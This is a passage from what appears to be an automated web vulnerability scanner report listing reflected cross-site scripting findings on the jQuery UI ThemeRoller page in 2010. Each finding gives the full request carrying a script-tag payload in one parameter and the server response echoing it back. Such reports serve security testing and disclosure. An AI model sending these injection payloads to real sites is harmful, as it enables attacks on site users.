GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada64e26"><script>alert(1)</script>1a3124de35d&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada64e26"><script>alert(1)</script>1a3124de35d&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=
...[SNIP]...

1.64. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e4f1"><script>alert(1)</script>409c40fb7a8 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa1e4f1"><script>alert(1)</script>409c40fb7a8&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
efa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa1e4f1"><script>alert(1)</script>409c40fb7a8&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

1.65. http://jqueryui.com/themeroller/ [bgColorShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6e9c"><script>alert(1)</script>97a66de1e5d was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaad6e9c"><script>alert(1)</script>97a66de1e5d&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaad6e9c"><script>alert(1)</script>97a66de1e5d&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.66. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload effe2"><script>alert(1)</script>ea171b4358b was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65effe2"><script>alert(1)</script>ea171b4358b&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65effe2"><script>alert(1)</script>ea171b4358b&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColo
...[SNIP]...

1.67. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37be1"><script>alert(1)</script>2443dcf35 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=7537be1"><script>alert(1)</script>2443dcf35&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120061

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=7537be1"><script>alert(1)</script>2443dcf35&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefaul
...[SNIP]...

1.68. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cf69"><script>alert(1)</script>f530c1d1079 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=753cf69"><script>alert(1)</script>f530c1d1079&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=753cf69"><script>alert(1)</script>f530c1d1079&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgC
...[SNIP]...

1.69. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b812"><script>alert(1)</script>7ded0019f81 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=955b812"><script>alert(1)</script>7ded0019f81&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=955b812"><script>alert(1)</script>7ded0019f81&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

1.70. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 465c6"><script>alert(1)</script>ee3c1ef3667 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75465c6"><script>alert(1)</script>ee3c1ef3667&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75465c6"><script>alert(1)</script>ee3c1ef3667&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22
...[SNIP]...

1.71. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b74b"><script>alert(1)</script>e7031a0cc1 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=554b74b"><script>alert(1)</script>e7031a0cc1&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120064

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=554b74b"><script>alert(1)</script>e7031a0cc1&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

1.72. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb22a"><script>alert(1)</script>8dcb00c57c8 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75fb22a"><script>alert(1)</script>8dcb00c57c8&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&